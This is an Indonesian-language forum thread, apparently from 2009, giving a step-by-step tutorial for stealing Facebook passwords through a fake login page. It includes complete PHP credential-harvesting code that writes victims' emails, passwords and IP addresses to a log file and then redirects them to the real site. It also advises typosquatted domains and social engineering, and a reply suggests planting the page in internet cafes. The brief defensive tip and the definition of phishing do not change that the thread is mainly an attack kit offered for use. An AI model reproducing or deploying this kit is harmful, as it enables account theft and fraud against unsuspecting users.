Cara hack menggunakan tehnik Physing

ok kita langsung aja menuju tutorial singkatnya

Pertama, lo bikin file log.php abis itu, lo ganti extensionnya jadi .php bukan .txt. trus, lo upload ke tempat hostingan lo. inget! tempat lo ngehosting pagenya harus support PHP. biasanya sih banyak yg menggunakan jasa ripway.com

abis itu, lo buat fake login pagenya, namanya facebook.htm ato apalah namanya. suka2 lo. jangan lupa, ganti extensionnya jadi .htm!
nanti line dibawah ini lo ganti pake log.php dari hostingan lo sendiri. lo cari aja
[You must be registered and logged in to see this link.]
selesai, abis itu lo upload pagenya.

terakhir, lo buat logfile buat nyimpen semua hasil password dan account yang udah diambil. logfile ini lo biarin aja kosong. ga usah lo ketik macem-macem.
kalo udah, lo upload filenya.

OYA, JANGAN LUPA! SEMUA FILE YANG UDAH DIUPLOAD LO MASUKIN KE FOLDER YANG SAMA. JANGAN MISAH2 SATU SAMA LAIN.

nah, kalo udah jadi, hasilnya akan jadi seperti ini
[You must be registered and logged in to see this link.]

persis kayak aslinya kan? tapi lo liat, address barnya. bukan facebook, melainkan [You must be registered and logged in to see this link.]
untuk masalah URL, lo bisa ganti addressnya pake web hosting gratis yang lain biar susah ketauan. jadi ga pake ripway. contoh URLnya fesbook, facebok, facebuuk, faceboot, kreasi lo aja. ato lo bisa make metode social engineering buat nyebarin fake login ini


PostSubyek: hack pasword fb menggunakan phising Sat 03 Oct 2009, 02:54
ok kita langsung aja menuju tutorial singkatnya * mau nulis banyak kagak ada yang bayar *

Pertama, lo bikin file log.php abis itu, lo ganti extensionnya jadi .php bukan .txt. trus, lo upload ke tempat hostingan lo. inget! tempat lo ngehosting pagenya harus support PHP. biasanya sih banyak yg menggunakan jasa ripway.com

abis itu, lo buat fake login pagenya, namanya facebook.htm ato apalah namanya. suka2 lo. jangan lupa, ganti extensionnya jadi .htm!
nanti line dibawah ini lo ganti pake log.php dari hostingan lo sendiri. lo cari aja
[You must be registered and logged in to see this link.]
selesai, abis itu lo upload pagenya.

terakhir, lo buat logfile buat nyimpen semua hasil password dan account yang udah diambil. logfile ini lo biarin aja kosong. ga usah lo ketik macem-macem.
kalo udah, lo upload filenya.

OYA, JANGAN LUPA! SEMUA FILE YANG UDAH DIUPLOAD LO MASUKIN KE FOLDER YANG SAMA. JANGAN MISAH2 SATU SAMA LAIN.

nah, kalo udah jadi, hasilnya akan jadi seperti ini
[You must be registered and logged in to see this link.]

persis kayak aslinya kan? tapi lo liat, address barnya. bukan facebook, melainkan [You must be registered and logged in to see this link.]
untuk masalah URL, lo bisa ganti addressnya pake web hosting gratis yang lain biar susah ketauan. jadi ga pake ripway. contoh URLnya fesbook, facebok, facebuuk, faceboot, kreasi lo aja. ato lo bisa make metode social engineering buat nyebarin fake login ini.

nah, last but not least, tips dari gw, buat ngehindarin phising/ fakelogin kayak bgini, jangan asal klik link. biasanya spam yang suka nyebarin bginian. ato misalnya udah terlanjur keklik, lo perhatiin address barnya. sesuai ga ama halaman web yang aslinya ??? coz GW dah pernah kena 1x




log php

Code:
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");

$handle = fopen($file, 'a');
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "n");
fwrite($handle, " ");
fwrite($handle, "n");
fwrite($handle, "n");
fclose($handle);
echo "<script LANGUAGE="JavaScript">
<!--
window.location="https://login.facebook.com/login.php?login_attempt=1";
// -->
</script>";
?>
oryginal post by : crucafix [You must be registered and logged in to see this link.]

Phising adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang terpercaya dalam sebuah komunikasi elektronik resmi, seperti posnel atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing (’memancing’), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna, Phising juga didefinisikan sebagai sebuah kegiatan memancing pemakai komputer di internet (user) agar mau memberikan informasi data diri pemakai (username) dan kata sandinya (password) pada suatu website yang sudah di-deface. Phising biasanya diarahkan kepada pengguna online banking. Isian data pemakai dan password yang vital yang telah dikirim akhirnya akan menjadi milik penjahat tersebut dan digunakan untuk belanja dengan kartu kredit atau uang rekening milik korbannya.

Pada phising facebook ini, si pelaku hanya berusaha untuk mengambil username dan password saja karena saat mencoba login user dihantarkan pada halaman Address Not Found. Tampilan scam page untuk phising facebook ini bisa di ganti apa aja .

Pertama kali istilah "phising" dipublikasikan oleh American Online Usernet Newgroup pada tanggal 2 Januari 1996 dan mulai menjamur pada tahun 2004. Pada tahun tersebut, perkembangan phising di dunia maya berkembang dengan pesat. Total kerugian akibat phising ditahun 2004 mencapai US$929 juta dengan melibatkan lebih dari 15.000 situs yang menjadi korbannya.

Kebanyakan dari teknik phising adalah melakukan manipulasi sebuah link di dalam email yang akan dikirimkan ke korbannya. Dengan adanya email, praktek phising terbilang mudah hanya dengan melakukan spam pada email dan kemudian menunggu korbannya untuk masuk kedalam tipuannya. Untuk meyakinkan bahwa link yang diberikan asli, biasanya si hacker ini akan membuat sebuah web yang sama persis dengan yang aslinya, perbedaannya URL yang dituju berbeda dengan link yang diberikan. Untuk orang awam yang kurang mengerti tentang web mungkin akan cenderung mudah ditipu, hal ini lah yang harus menjadi waspada untuk Anda agar tidak terkena korban penipuan. Antara link yang diberikan dengan address yang dituju tidak sesuai. Anda hanya tau dan akan menyangka bahwa link tersebut adalah benar karena dikirim melalui email.


14D Have a Nice Day

hooo, teknik phising facebook rupanya....

sekedar tambahan, teknik fake login kaya gini kayanya cocok diaplikasikan di warnet. dengan memasang start page dibrowser dengan tampilan langsung fake login facebook....

tapi kayanya ga bisa lagi bikin script .html yang berhubungan dengan fakelogin facebook deh dengah menggunakan hostingan free. soalnya di TOS udah tertulis. saya pernah nyoba, langsung dibanned akun saya....di 000webhost. huahaahahaaha

yang mesti dipastiin mungkin hostingan yang dipake ama teknik phising kaya gini palingan dengan hostingan berbayar doang kali ya?

kecuali script .php-nya bisa dijalankan via localhost warnet-nya! huahaahaha....

ini mah soceng....tapi masih efektif sih buat ngejebak orang orang cupu

hummm